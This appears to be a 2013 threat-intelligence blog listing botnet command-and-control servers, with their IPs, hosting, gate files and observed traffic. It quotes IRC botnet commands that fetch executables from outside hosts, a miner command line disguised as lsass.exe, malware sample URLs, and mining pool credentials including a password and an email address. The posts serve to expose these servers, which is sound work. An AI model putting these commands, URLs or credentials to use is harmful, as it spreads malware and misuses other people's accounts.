pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)

By Pig, May 18, 2013
Uncategorized

Resolved : [pool.50btc.com] To [144.76.52.43] HTTP Requests: hxxp://pool.50btc.com:8332/ DATA: POST / HTTP/1.1Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==Content-Length: 128X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchtoUser-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3) Host: pool.50btc.com:8332Cache-Control: no-cache {“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0} Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332 Sample:hxxp://158.255.2.104/cucaz.exe hosting infos: http://whois.domaintools.com/144.76.52.43

122.195.244.35(irc botnet hosted in China Nanjing Huaianwangtongdizhichi Huaian Jiangsu Province)

By Pig, May 16, 2013
Uncategorized

Server:122.195.244.35:8888 Now talking in #!x!Topic:Topic: Set by [Yuri (unknown address)] at (Thu May 16 09:59:25 2013) other channels: Now talking in #1Topic On: [#1 ] [ !NAZEL hxxp://146.185.246.190/7384IEP.da !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe ]Topic By: [ p81 ] Now talking in #2Topic On: [ #2 ] [!NAZELturbo hxxp://146.185.246.190/7384IEP.da udos.exe | !NAZEL hxxps://hotfile.com/dl/223005198/7893880/g.exe yufck.exe ]Topic By: [ p81 ]Read more...

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)

By I_Post_Ur_Info, May 15, 2013
Uncategorized

Resolved wrightfeldhusen.info to 69.197.35.109 Server:  wrightfeldhusen.info Gate file:  /beta/order.php Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info  This is hosted on the same server as this andromeda bot. Hosting infos: http://whois.domaintools.com/69.197.35.109

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)

By I_Post_Ur_Info, May 14, 2013
Uncategorized

Resolved www.panel-gc.co.uk to 69.197.35.109 Server:  www.panel-gc.co.uk Gate file:  /panel/gate.php Plugins:  hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod This is andromeda 2.7, not the older cracked version. Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo Hosting infos: http://whois.domaintools.com/69.197.35.109

vhost.bounceme.net(irc botnet hosted in France Paris Nerim Sas)

By Pig, May 10, 2013
Uncategorized

Resolved : [vhost.bounceme.net] To [194.242.114.177] Server: 194.242.114.177:6667 Server Password: Username: Pmx Nickname: aKH-4mins Channel: #sys# (Password: ) Channeltopic: same guy diferent domain: scan.no-ip.org    194.242.114.177 Server: 194.242.114.177:6667 Server Password: Username: skjcxmot Nickname: [nLh-VNC]otkfck Channel: sex (Password: ) Channel: #bot Channeltopic: Credits to x00 for samples:-) Hosting infos: http://whois.domaintools.com/194.242.114.177